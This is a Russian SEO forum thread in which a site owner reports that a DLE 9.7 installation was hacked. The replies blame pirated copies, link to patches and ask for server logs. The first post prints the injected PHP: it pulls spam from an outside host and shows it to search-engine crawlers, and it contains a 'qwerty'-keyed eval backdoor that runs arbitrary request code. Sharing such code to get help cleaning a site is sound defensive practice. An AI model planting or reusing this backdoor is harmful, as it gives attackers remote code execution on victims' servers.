Взломали сайт dle 9.7 - SEO форум MaulTalk.com

Сообщение сайта

(Сообщение закроется через 3 секунды)

Здравствуйте, гость (

| Вход | Регистрация )

SEO форум MaulTalk.com > Веб-строительство > Программная часть

2 страниц

1 2 >

Взломали сайт dle 9.7

Опции

vasyatko

Topic Starter

20.11.2012, 19:38; Ответить: vasyatko

Сообщение #1

Завсегдатай

Группа: Active User
Сообщений: 871
Регистрация: 2.6.2008
Поблагодарили: 215 раз
Репутация:

Взломали сайт dle 9.7
На главной странице

Fatal error: Call to undefined function gzinflate() in /home/admin/data/www/vkonatke.in/get.php(3) : eval()'d code on line 1

В index.php

<?php
//###==###
error_reporting(0);

$host = "http://vkonatke.in/get.php";

$ident = "qwerty";

        $bot = urlencode($_SERVER['HTTP_USER_AGENT']);

    if (preg_match("/(yandex|google)/i", $_SERVER['HTTP_USER_AGENT'])) {

        $id = urlencode("http://".$_SERVER['SERVER_NAME'].$_SERVER['REQUEST_URI']);

        $url = $host."?id=".$id."&charset=w&bot=".$bot;

            if(ini_get("allow_url_fopen") == 1) {

                echo file_get_contents($url);

            }elseif(function_exists('curl_init')) {

                $ch = curl_init($url);

                curl_setopt($ch, CURLOPT_HEADER, FALSE);

                curl_setopt($ch, CURLOPT_RETURNTRANSFER, TRUE);

                $result = curl_exec($ch);

                curl_close($ch);

            echo $result;

        }

    }

        $url = $host."?code=code&bot=".$bot;

            if(ini_get("allow_url_fopen") == 1) {

                echo file_get_contents($url);

            }elseif(function_exists('curl_init')) {

                $ch = curl_init($url);

                curl_setopt($ch, CURLOPT_HEADER, FALSE);

                curl_setopt($ch, CURLOPT_RETURNTRANSFER, TRUE);

                $result = curl_exec($ch);

                curl_close($ch);

            echo $result;

        }

        if($_REQUEST["c"] == $ident) eval(stripslashes($_REQUEST["code"]));

//###==###
?>

--------------------

Хороший Хостинг

Ответить с цитированием данного сообщения

fioru fioru 20.11.2012, 20:18; Сообщений: 508 Поблагодарили: 172 раза Репутация: 37 Просмотр профиля	20.11.2012, 20:18; Ответить: fioru Сообщение #2
Завсегдатай Группа: Active User Сообщений: 508 Регистрация: 30.11.2010 Из: Смоленск Поблагодарили: 172 раза Репутация: 37	Раз пишите тут а не на официальном, видимо пользуетесь null'ом, а там шеллов хватает, чему тогда удивляться что вас взломали?

OldSpice OldSpice 20.11.2012, 20:30; Сообщений: 1617 Поблагодарили: 270 раз Репутация: 51 Просмотр профиля	20.11.2012, 20:30; Ответить: OldSpice Сообщение #3
Старожил Группа: Active User Сообщений: 1617 Регистрация: 17.8.2011 Из: Латвия Поблагодарили: 270 раз Репутация: 51	http://dle-news.ru/bags/v97/1538-patchi-be...97-i-nizhe.html Поблагодарили: (1) nikitabaks

tsa tsa 20.11.2012, 20:51; Сообщений: 448 Поблагодарили: 20 раз Репутация: -4 Просмотр профиля	20.11.2012, 20:51; Ответить: tsa Сообщение #4
Бывалый Группа: User Сообщений: 448 Регистрация: 6.2.2011 Из: manucoz.ru Поблагодарили: 20 раз Репутация: -4	Покупайте лицензию и не каких проблем не будет =) а нулл это дело такое... тож когда то стял нул взломали перешол на лицуху и не каких проблем больше небыло -------------------- Хостинг onelime 1.56$ или 60руб месяц 2000 МБ Поблагодарили: (0)

vasyatko Topic Starter vasyatkoTopic Starter 20.11.2012, 22:39; Сообщений: 871 Поблагодарили: 215 раз Репутация: 49 Просмотр профиля	Topic Starter 20.11.2012, 22:39; Ответить: vasyatko Сообщение #5
Завсегдатай Группа: Active User Сообщений: 871 Регистрация: 2.6.2008 Поблагодарили: 215 раз Репутация: 49	fioru и tsa просто ненадо нулл откуда попало качать. Здесь дело не в нулл версии. OldSpice Степень опасности: Высокая при использовании включенной настройки register_globals Эта функция была отключена. Был только включен magic_quotes_gpc -------------------- Хороший Хостинг

fioru fioru 20.11.2012, 22:41; Сообщений: 508 Поблагодарили: 172 раза Репутация: 37 Просмотр профиля	20.11.2012, 22:41; Ответить: fioru Сообщение #6
Завсегдатай Группа: Active User Сообщений: 508 Регистрация: 30.11.2010 Из: Смоленск Поблагодарили: 172 раза Репутация: 37	vasyatko, я их вообще не качаю) А вот вы видимо качаете где поподя, хотя не исключено что у Вас вообще дыры на стороне серверного ПО

Rampage Rampage 20.11.2012, 23:31; Сообщений: 242 Поблагодарили: 69 раз Репутация: 24 Просмотр профиля	20.11.2012, 23:31; Ответить: Rampage Сообщение #7
Участник Группа: User Сообщений: 242 Регистрация: 20.11.2010 Из: localhost Поблагодарили: 69 раз Репутация: 24	а логи сервера есть? -------------------- 🔥Интернет магазин теплотехники FARRO

kagtus kagtus 20.11.2012, 23:39; Сообщений: 421 Поблагодарили: 95 раз Репутация: 22 Просмотр профиля	20.11.2012, 23:39; Ответить: kagtus Сообщение #8
Бывалый Группа: User Сообщений: 421 Регистрация: 11.10.2012 Из: Kostroma Поблагодарили: 95 раз Репутация: 22	помочь очистить??? -------------------- ася 45два48499два удалю вирусы, помогу с сайтом ->отзывы ТУТ и ТАМ

GET_ini GET_ini 21.11.2012, 18:45; Сообщений: 223 Поблагодарили: 33 раза Репутация: 6 Просмотр профиля	21.11.2012, 18:45; Ответить: GET_ini Сообщение #9
Участник Группа: User Сообщений: 223 Регистрация: 6.11.2012 Из: Украина Поблагодарили: 33 раза Репутация: 6	Rampage верно подмечено! ТС покажи логи! Через какой именно файл Вас Геттили и инклудили

AleZ AleZ 21.11.2012, 19:01; Сообщений: 70 Поблагодарили: 28 раз Репутация: 6 Просмотр профиля	21.11.2012, 19:01; Ответить: AleZ Сообщение #10
Частый гость Группа: User Сообщений: 70 Регистрация: 7.6.2012 Из: Москва Поблагодарили: 28 раз Репутация: 6	Зря сразу про нуллы писать начали, да и версия 9.7 весьма устойчивая к взломам (но и тут без патча не обошлось ). В последнее время зачастую ломают через различные модули каталогов, переходов и так далее. Если движок интенсивно обновляется, то авторы модулей не спешат. Еще, не стоит снимать со счета права на запись в разные директории,шаблоны с сомнительных сайтов, проблемы хостера, отсутствие антивруса, криворукость и угнанные пароли. В первую очередь стоит снять логи с сервера и посмотреть, откуда лезли и какие файлы затронули еще.

« Предыдущая тема · Программная часть · Следующая тема »

2 страниц

1 2 >

2 чел. читают эту тему (гостей: 2, скрытых пользователей: 0)

Пользователей: 0

Похожие темы

Тема	Ответов	Автор	Просмотров	Последний ответ
Будет ли склейка сайтов если старый телефон перенести на новый сайт?	1	noviktamw	391	Вчера, 18:31 автор: malamut
Ваш сайт блокирует Роскомнадзор?	29	hollywooduk	6021	Вчера, 11:21 автор: hollywooduk
Прототипирование + дизайн + вёрстка = красивый и эффективный сайт под ключ	0	bunneh	462	16.4.2024, 18:02 автор: bunneh
Если в сайт с одними ключами, которые там долго, добавить новую рубрику с новыми ключами	2	Tutich	1333	16.4.2024, 8:27 автор: Tutich
[Услуги] Баннер/Графика/Сайт	240	FillPlay	180639	31.3.2024, 22:58 автор: FillPlay

Режим отображения: Стандартный · Переключить на: Линейный · Переключить на: Древовидный

Подписка на тему · Сообщить другу · Версия для печати · Подписка на этот форум

Текстовая версия

Сейчас: 25.4.2024, 14:05

Дизайн